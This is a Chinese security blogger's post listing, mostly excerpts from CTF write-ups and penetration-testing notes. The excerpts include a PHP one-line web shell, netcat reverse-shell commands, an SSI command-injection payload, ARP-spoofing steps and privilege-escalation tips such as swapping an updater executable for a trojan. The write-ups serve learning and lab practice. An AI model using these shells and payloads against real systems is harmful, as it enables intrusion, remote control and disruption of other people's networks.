自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(67)
  • 资源 (2)
  • 收藏
  • 关注

转载 [HCTF 2018]admin

在BUUCTF上看到这题存在三种解法,感觉比较经典,就想着来复现一下顺便学习一波。存在以下三种解法:flask session 伪造unicode欺骗条件竞争拿到题目发现一共就登录注册两个功能,随便注册一个test/test用户登录之后查看源码发现提示<!-- you are not admin -->,根据提示和题目名估计要让我们登录admin用户就可以得到flag。在change password页面查看源码,发现提供了题目的源码地址<!-- https://git

2020-07-03 14:27:20 641

原创 无列名注入总结

爆表名库名information_schema数据库是mysql中的信息数据库,它保存着mysql所有其他数据库的信息,包括了数据库名,表名,字段名等,但是如果waf过滤的这个数据库呢schema_auto_increment_columns//该视图的作用简单来说就是用来对表自增ID的监控,可以通过该视图获取数据库的表名信息。schema_table_statistics_with_buffer,x$schema_table_statistics_with_buffer//没有自增数据mysq

2020-06-10 15:45:50 2866 1

原创 linux提权总结

文章目录通过定时计划提权漏洞提权Linux内核的漏洞利用服务器中各种程序的漏洞suid提权shell提权弱口令提权配置文件提权MySQL数据库导出提权脚本未授权访问sudoer配置文件错误使用环境变量进行提权通过定时计划提权普通用户可写,但是是以root用户运行的,查看/etc/crontab目录,发现有一个/tmp/sekurity.pymartin@debian:/tmp$ cat /etc/crontab# /etc/crontab: system-wide crontab# Unlike

2020-06-05 13:09:32 863

原创 常见的四种硬盘接口介绍

文章目录IDE(ATA)SCSISATASASIDE(ATA)IDE ( Integrated Drive Electronics ,电子集成驱动器)的本意是指把"硬盘控制器”与"盘体"集成在一起的硬盘驱动器。但是IDE的数据传输率<1.5MB/s.最多可连接两个IDE设备每个磁盘的容量不可超过528MB现在基本淘汰后来推出EIDE ( enhanced IDE增强型IDE)EIDE的数据传输率12~ 18MB/s最多可连接4个IDE设备每个磁盘的容量可超过528MB特点:价格

2020-06-03 17:47:57 5971 1

原创 仿射密码解密脚本

格式e(x)=ax+b(mod26)def get(a, b): if b == 0: return 1, 0 else: k = a //b remainder = a % b x1, y1 = get(b, remainder) x, y =y1, x1 - k * y1 return x, y s = input("请输入解密字符:").upper()a = int(input("请输入a:

2020-06-01 18:11:53 793 1

原创 [GKCTF2020]CheckIN详解

打开之后是这样的,没有发现反序列化函数,但是发现有一个@eval,想到了一句话,这是用base64进行传参首先传参phpinfo();看看,需要经过base64编码http://e0cc90ac-d4bc-450c-a6a4-476298ce7c18.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==找到disable_functions,发现过滤了许多危险函数我们上传一个一句话木马看看eval($_POST[123]);,经过base64是ZXZhbCgkX1

2020-06-01 17:45:40 4421 4

原创 sqli-labs靶场搭建过程及报错解决方法

下载后放在www目录下,我这里用的是phpstudy_pro修改数据库密码运行时结果是这样的查了好多资料说是php的版本不能超过5.5,我看了一下,也没超过5.5啊然后我就去修改靶场代码,都修改了依旧报错折腾好久后发现php的版本根本就不能看上面那个位置,应该是看这个位置,也是在这里安装更多的php版本修改后成功如果我用的是phpstudy2018或者wamp的话就没这么多毛病了。。。...

2020-06-01 12:39:51 3261 2

原创 无报错的VC++6.0下载及安装教程——过程超级简单,win10亲测可以有效避免各种报错

之前找了好多版本的,在最后都是无响应,要不就是缺少一个dll,找了好久终于找到一个可以完美安装且无任何报错的版本

2020-05-31 21:00:14 1008 2

原创 VirtualBox下Linux系统一分钟安装增强功能教程(小白一眼就会)

之前在搭建靶场时,发现只能用VirtualBox,但是VirtualBox和VMware的kali竟然不在同一局域网,弄得我很难受,就直接装一个kali吧,当然增强功能是少不了的首先点击设备,选择增强功能,然后就会出现类似于这个的报错这个时候不用管它,直接打开计算机然后点开就行了右键复制到主目录打开终端,输入chmod 777 VBoxLinuxAdditions.run进行提权在输入./VBoxLinuxAdditions.run即可,最后会出现xxxxx false,不用管它,只要页面变

2020-05-31 15:32:13 2964 1

原创 出现VMware Workstation 与 Device/Credential Guard 不兼容.在禁用 Device/Credenti的一种可能

运行虚拟机时出现VMware Workstation 与 Device/Credential Guard 不兼容.在禁用 Device/Credenti报错网上的方法只有这两种,这里附上链接:https://www.cnblogs.com/navysummer/p/12792401.html但是更新了win10 1909版本后什么都变了,而且之前还好好的,这些服务我根本就没动过,虚拟机怎么就突然坏了呢经过一番努力(此处省略800字),找到了原因,因为今天我好奇,所以开了win10的虚拟机监控程序平台

2020-05-28 20:36:00 3393

原创 计算机硬盘存储器相关概念

文章目录磁道,扇区,簇的概念硬盘结构记录密度磁盘容量主轴转速数据传输率缓冲存储区大小误码率磁道,扇区,簇的概念硬盘与光盘不同,硬盘是一个一个同心圆,每一个同心圆就是一个磁道,磁道从外向内编号,一般一个簇是两个扇区(也可能是4个,八个,2n )硬盘结构一个硬盘有许多个盘面,一个盘面有两面,从上到下分别是0面,1面,2面。。。记录密度道密度:径向单位长度的磁道数,在数值上等于磁道距P的倒数,单位为TPI ( tracks per inch )或TPM ( tracks per millimet

2020-05-28 18:44:06 3800 8

原创 win10 1909版本无法修改默认浏览器(闪退)解决方法

今天更新的win10 1909之后,发现默认浏览器被修改成Internet explorer了,想修改发现改不了,一点就闪退到网上找解决方法,有说用控制面板打开默认程序就像这样结果我打开设置默认浏览器后直接又跳转这了,这种方法失败。。。还有的说打开启用或关闭windows功能,取消Internet explorer 11的选项,结果取消不了,会报错还有的说直接禁用服务,反正我是不敢找了好久也没找到有效的解决办法,后来灵机一动,决定以毒攻毒,下载了电脑管家,在安全工具中找到浏览器保护,直

2020-05-28 13:52:41 14612 16

原创 内存储器(主存储器)的分类及存储芯片的扩展方式

主存储器分类ROM(read only memory ,只读存储器)分类:特点:在机器运行过程中只能读出不能写入信息无源存储器非易失性器件(断电不丢失)存储的信息是用特殊方式写入的RAM(random access memory ,随机存储器)这里的RAM的"随机”,包含了可以在线读写,也包含了可以直接读写任何单元两重意思。SRAM ( static RAM)。SRAM是利用开关特性进行记忆,只要电源有电,它总能保持两个稳定的状态中的一个状态。静态RAMDRAM ( dyna

2020-05-28 13:13:14 4730

原创 计算机存储器简介、分类和性能衡量标准

文章目录存储器简介数据存储介质的分类按照存储方式分类按照信息保存时间分类按照功能或存储体系的分层结构分类衡量性能指标存储容量存取周期可靠性性能价格比存储器简介存储器分为两种:内存储器或主存储器。(简写为MM)外存储器或辅助存储器。(简写为AM)一个存储器必须包括:1.存储体(单元)。(如下图最右面的格子,一般情况一个格子就是一个存储单元)存储一个字的存储单元叫字存储单元,其地址叫字存储地址存储一个字节的存储单元叫字节存储单元,其地址叫字节存储地址2.指定存储单元的单元地址。(相当于存储

2020-05-27 15:45:49 2439

原创 kali报错ERROR 2002 (HY000)的一种可能

很简单,输入service mysql start即可,你看,错误是不是变了之后的解决方法见我的另一篇博客kali关于ERROR 1698 (28000): Access denied for user ‘root’@'localhost’解决方法

2020-05-26 21:47:20 246

原创 CTF靶场之FTP服务后门利用

FTP(File Transfer Protocol,文件传输协议)是TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控

2020-05-26 18:39:40 702

原创 利用SQL注入上传木马拿webshell

学到了一种操作,说实话,我从来没想过还能这样正常情况下,为了管理方便,许多管理员都会开放MySQL数据库的secure_file_priv,这时就可以导入或者导出数据当我如图输入时,就会在D盘创建一个名为123456.php,内容为<?php phpinfo();?>的文件我们可以利用这一点运用到SQL注入中,从拿下数据库到拿下目标的服务器比如我们在使用联合查询注入,正常是这样的语句http://xxx?id=-1 union select 1,'你想知道的字段的内容或查询语句',

2020-05-25 17:35:53 1883

原创 使用新版kali的MySQL遇到的问题—ERROR 2002(HY000)与ERROR 1698(28000) 报错

ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock'ERROR 1698 (28000): Access denied for user 'root'@'localhost'

2020-05-25 15:11:43 1464 1

原创 arp欺骗----netfuke使用教程

这个工具我有设置免费下载打开设置,选择嗅探设置选择你的网卡,一般默认即可勾选图中所勾选的内容,之后确定打开设置选择arp欺骗设置选择双向欺骗,来源IP就是被攻击者的IP,目标IP是被攻击人的网关,点击确定之后点击插件管理,就是这个小钳子勾选然后双击第四个,可以把HTML body后面的改成自己喜欢的内容,然后确定,点击开始然后目标访问的所有的网站都会这样,欺骗成功...

2020-05-23 21:23:23 4961 6

原创 php代码审计中常见的ini配置

文章目录PHP的配置文件php.ini.user.iniPHP相关语法相关变量配置启用全局变量短标签安全模式安全模式下执行程序主目录禁用类/函数上传文件及目录权限设置上传及最大上传文件大小:文件上传临时目录:用户访问目录限制:错误信息错误信息控制设置错误报告的级别错误日志PHP的配置文件php.ini这个配置文件也可以是php.版本号.ini这个配置文件在PHP启动的时候会被读取,对于服务器模块版本的PHP,仅仅在web服务器启动时读取一次.而对于CGL和CLI版本的话,每次调用都会读取。CGL:

2020-05-23 20:32:52 319 1

转载 验证码绕过技巧

原理:客户端发起请求->服务端响应并创建一个新的SessionID同时生成随机验证码,将验证码和SessionID一并返回给客户端->客户端提交验证码连同SessionID给服务端->服务端验证验证码同时销毁当前会话,返回给客户端结果。【客户端可能存在的安全问题】1、有的网站验证码由本地js生成仅仅在本地用js验证。可以在本地禁用js,用burp把验证字段删除。2、有的网站把验证码输出到客户端html中,送到客户端Cookie或response headers。3、有些网站默

2020-05-22 21:38:28 17571

原创 ssi注入详解

ssi是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤,可能存在SSI注入漏洞简单的说ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令首先netdiscover -r 你的ip/24扫描得到靶场IP用nmap进行扫描用dirb进行扫描发现了ssi,意识到可能是ssi注入访问一下http://192.168.199.1

2020-05-22 19:20:06 1791 1

转载 利用arpspoof进行局域网断网攻击

      关于局域网断网攻击,顾名思义,就是对局域网内某个IP或全部IP进行攻击,让局域网内某个IP或全部IP断网,这是不是很有趣。     原理:关于arp断网攻击是基于arp协议的缺陷,这其实是arp欺骗的时候配置错误引起的现象。就是以...

2020-05-20 14:02:37 6518 3

原创 搜狗输入法提权

搜狗低版本输入法根目录下有一个PinyinUp.exe,是用来更新词典用的,搜狗输入法目录默认是Everyone可读可写,搜狗每隔一段时间就会自动升级,而升级的文件是PinyinUp.exe,而搜狗输入法对程序没有经过检查就直接执行了,这就造成了一个漏洞,我们可以上传一个同名字的其他程序进行覆盖。我们只要把这个文件替换为自己的后门或木马或其他命令程序,等管理员使用搜狗的时候,就可以达成我们的目的了上传成功后,当执行升级命令时就会触发后门或木马...

2020-05-19 09:11:36 637

原创 初识CSRF漏洞

CSRF:跨站请求伪造危害:依靠用户标识危害网站利用网站对用户标识的信任欺骗用户的浏览器发送HTTP请求给目标站点可以通过IMG标签触发一个GRT请求,利用它实现CSRF攻击<img src="http://www.baidu.com">原理:在提交修改是他会提交请求,可以被模仿构造,比如这是你的银行账户我们可以构造一个表单,在text出写入你想要修改后的值效果如图,比如这是http://xxxx/1.html,如果你在cookie有效时点击了提交按钮,他就会自动把请求

2020-05-18 20:40:08 166

原创 利用nc反弹shell

正向shell:攻击机主动连接靶机攻击机主动连接并得到反弹shell nc 靶机ip 53##因为防火墙的原因,通常不会成功服务端监听连接 nc -lp 53 -e /bin/sh ##-lp就是-l,-p写在一起 nc -lp 53 -e c:\windows\system32\cmd.exe ##windows反向shell:靶机连接攻击机(靶机运行了攻击机制作的后门程序)攻击机监听nc -lp 53 ##通常选用80,53等常用端口,防止连接失败靶机连接攻击机nc 攻击机ip

2020-05-18 17:08:43 491

原创 已有虚拟磁盘多个vmdk文件导入虚拟机

不需要合并多个vmdk文件为一个

2020-05-18 16:07:19 7062 3

原创 CTF之SSH私钥泄露

打开靶机,如图,并不知道密码,所以无法登陆打开kali,使用netdiscover命令 netdiscover -r 你的ip/24 命令来探测靶机,比如你kali的IP是192.168.153.54,那么输入netdiscover -r 192.168.153.54/24注意的24代表探索IP的D段,表示子网位数,即子网掩码为255.255.255.0,转成二进制为:11111111 11111111 11111111 00000000,有24个1,如果24改成16,就可以探索IP的C段了,改成8,就

2020-05-18 15:15:29 908

原创 kali更新源遇到的问题——Release文件已经过期解决方法及产生原因猜测

更新源时,遇到报错,说Release文件已经过期,换了阿里源,清华源,中科大源都不好用E: http://mirrors.ustc.edu.cn/kali/dists/kali-rolling/InRelease 的 Release 文件已经过期(已经过期了 24天 0小时 48分 46秒)。该仓库的更新将不会应用。本以为直接apt-get upgrade就可以了,但是很多工具都报错IOError: [Errno socket error] [Errno 111] Connection refused

2020-05-17 13:35:42 6964

原创 使用Social-Engineer Toolkit遇到的问题

打开之后是这个样子的,报错 urllib.error.URLError: <urlopen error [Errno -2] Name or service not known>搜索文件resolv.conf,打开etc目录下的写入nameserver 8.8.8.8成功运行

2020-05-17 13:26:46 1225 2

原创 session三种php序列化机制

php储存session的三种方式php_serialize经过serialize()函数序列化数组php键名+竖线+经过serialize()函数处理的值php_binary键名的长度对应的ascii字符+键名+serialize()函数序列化的值127.0.0.1/test.php?xxx=123xxx是键,这里的s是字符串,3是字符串的长度这里的<0x03>是ASCII码的值,xxx是键名,s代表字符串,3是字符串的长度a代表数组,

2020-05-17 12:47:48 312

原创 社会工程学脑图

2020-05-13 11:18:33 342

原创 ARP攻击原理详解

ARP缓存投毒主机型ARP欺骗:欺骗者主机冒充网关设备对其他主机进行欺骗网关型ARP欺骗:欺骗者主机冒充其他主机对网关设备进行欺骗首先了解ping 192.xxx.xxx.xxx的过程1.找ARP缓存(MAC地址)mac地址也叫物理地址和局域网地址,主要用于确认网上设备的地址,类似于身份证号,具有唯一标识2.如果没有ARP缓存就广播IP168.xxx.xxx.xxx,然后得到mac地址...

2020-05-12 17:28:10 3216

原创 社会工程学密码生成器安装及报错解决

SocialEngineeringDictionaryGenerator地址链接在这里,体验盒子上的本来开开心心的装,结果第二步就报错ERROR: Could not open requirements file: [Errno 2] No such file or directory: 'requirements.txt'上网上查,让升级pip,好的,我去升级然而没啥鸟用,继续查,让配环境变量,我去看了一下环境变量没有任何问题。。。。经过一番折腾,查出原因是在执行这一语句前需要先创建

2020-05-11 12:28:04 770

原创 php代码审计之代码执行函数(4)

文章目录eval代码执行注入assert 代码执行注入preg_replace正则代码执行注入pattern第一个参数replacement第二个参数preg_replace()第三个参数在php里面有一些函数将输入的字符串参数当作PHP程序代码来执行常见代码执行函数:eval 、assert 、preg_replaceeval代码执行注入test.php如下<?phpif(isset($_GET['rayi'])){$rayi=$_GET['rayi'];eval("\$rayi =

2020-05-10 17:43:11 329

原创 php代码审计之命令注入(3)

文章目录system()命令:exec():passthru():反引号:shell_exec:popen:proc_open:pcntl_exec:system()命令:system执行外部程序(命令行),并且显示输出这个函数会将结果直接进行输出,命令成功后返回输出的最后一行,失败返回FALSEsystem.php源码如下:<?php$action = $_GET['cmd'];echo "<pre>";system($action);echo "<pre/&g

2020-05-10 09:45:16 553

原创 巴西烤肉提权

1.churrasco.exe是2003系统一个本地提权漏洞,通过此工具可以以SYSTEM权限执行命令,从而可以达到添加用户的目的。2.pr.exe提权windows跟踪注册表项的ACL权限提升漏洞Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或Loc

2020-05-09 17:57:17 3555

原创 御剑系列扫描工具(五款)下载

链接:https://pan.baidu.com/s/12cFRdD61ssj2TBPgMtlauQ提取码:u48s

2020-05-09 15:28:44 19230 13

原创 php代码审计之超全局变量(2)

文章目录$_GET –> get传送方式$_POST –> post传送方式$_REQUEST –> 可以接收到 get 和 post 两种方式的值$GLOBALS –> 引用全局作用域中可用的全部变量$_FILES –>文件上传变量$_SERVER –> 服务器和执行环境信息$_SESSION –> 用于会话控制$_COOKIE –> 用于会话控制$_ENV –> 服务器端环境变量超全局变量 在 PHP 4.1.0 中引入,是在全部作用域中始终可用的

2020-05-09 09:08:56 297

原创 pcanywhere提权

用大马访问pcanywhere默认安装目录,下载用户配置文件用工具破解密码这里是你的主机,选择连接另一台计算机到我的电脑输入之前的账号密码连接成功

2020-05-08 19:23:56 252

NetFuke_1.07.zip

Windows下arp欺骗工具,嗅探欺骗常用工具,中间人攻击常用,在进行渗透测试中目标无法成功渗透,可以转换目标到c段其他IP,之后通过arp欺骗,有奇效

2020-05-23

Firefox.zip

旧版本的Firefox,含有各种网络攻防需要的插件,如firebug,hackber,SQL inject me,xss me等等插件

2020-04-09

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除